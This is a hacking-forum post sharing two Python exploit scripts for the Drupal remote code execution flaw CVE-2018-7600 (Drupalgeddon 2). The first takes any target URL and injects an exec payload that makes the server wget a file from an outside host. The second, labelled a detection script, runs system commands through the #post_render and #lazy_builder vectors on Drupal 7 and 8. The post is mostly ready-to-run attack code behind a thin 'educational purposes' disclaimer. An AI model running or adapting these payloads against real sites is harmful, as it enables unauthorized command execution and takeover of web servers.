drupal7~8 CVE-2018-7600 EXP
#1
hallo !
Two Python scripts
 EXP.py
Code:
#!/usr/bin/env
import sys
import requests

print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')

target = input('Enter target url (example: https://domain.ltd/): ')

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://gist.githubusercontent.com/a2u/66680e1f4abac79d654424ffdb1b410d/raw/d417bbfa8137a1ef53124522a87b1ad1d2b8ec96/hello.txt'}

r = requests.post(url, data=payload)
if r.status_code != 200:
 sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')


Detection script.py
Code:
#!coding:utf-8
import requests
import re

print ('###################################')
print ('### POC for drupal CVE-2018-7600')
print ('### by Monster5')
print ('###################################')
print ('\n')

check_host={
   'http://192.168.168.8/drupal-7.57/',
   'http://192.168.168.8/drupal-8.5.0/',
   
}

for host in check_host:
   if host[-1::] != '/':
       host += '/'

   #checking drupal7
   print('\n'+'checking host: '+ host)
   print('checking drupal 7.x ......')

   url = host+'?q=user/password&name[%23post_render][]=system&name[%23markup]=echo%20pwn!!!&name[%23type]=markup'
   data = {
       'form_id':'user_pass',
       '_triggering_element_name':'name'
   }
   r = requests.post(url,data = data,verify = False,timeout = 5)

   result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)

   if result:
       found = result.group(1)
       url = host + '?q=file/ajax/name/%23value/'+found
       data = {'form_build_id' : found}
       r = requests.post(url,data = data,verify = False,timeout = 5)

       if 'pwn' in r.text:
           print('pwn!!!'+'\n'+host)
       else:
           print('fail')
   else:
       print('fail')


   #checking drupal8
   print('\n'+'checking drupal 8.x ......')
   payload = {
   'mail[a][#lazy_builder][0]':(None,'system'),
   'mail[a][#lazy_builder][1][]':(None,'echo pwn!!!'),
   'form_id':(None,'user_register_form')
   }

   headers = {'X-Requested-With': 'XMLHttpRequest'}

   url = host+'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'    
   r = requests.post(url,files = payload, headers = headers,verify = False,timeout = 5)

   if  'pwn' in r.text:
       print('pwn!!!'+'\n'+host)
   else:
       print('fail')
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Need help exploiting CVE-2010-4345 using exim4_string_format on a virtual server 3thos 1 980 01-17-2022, 07:45 PM
Last Post: mendax
  PrintNightmare Vulnerability | CVE 2021-1675 & CVE-2021-34527 Insider 1 826 01-11-2022, 06:28 PM
Last Post: Insider
  [Podcast] D0rkerDevil talks about bug bounties & cve's LaZr4us 0 8,838 06-13-2020, 05:24 AM
Last Post: LaZr4us
  GICSP SANS 410 Pdf & mp3 2018 syh4ck 0 8,573 04-13-2020, 10:31 AM
Last Post: syh4ck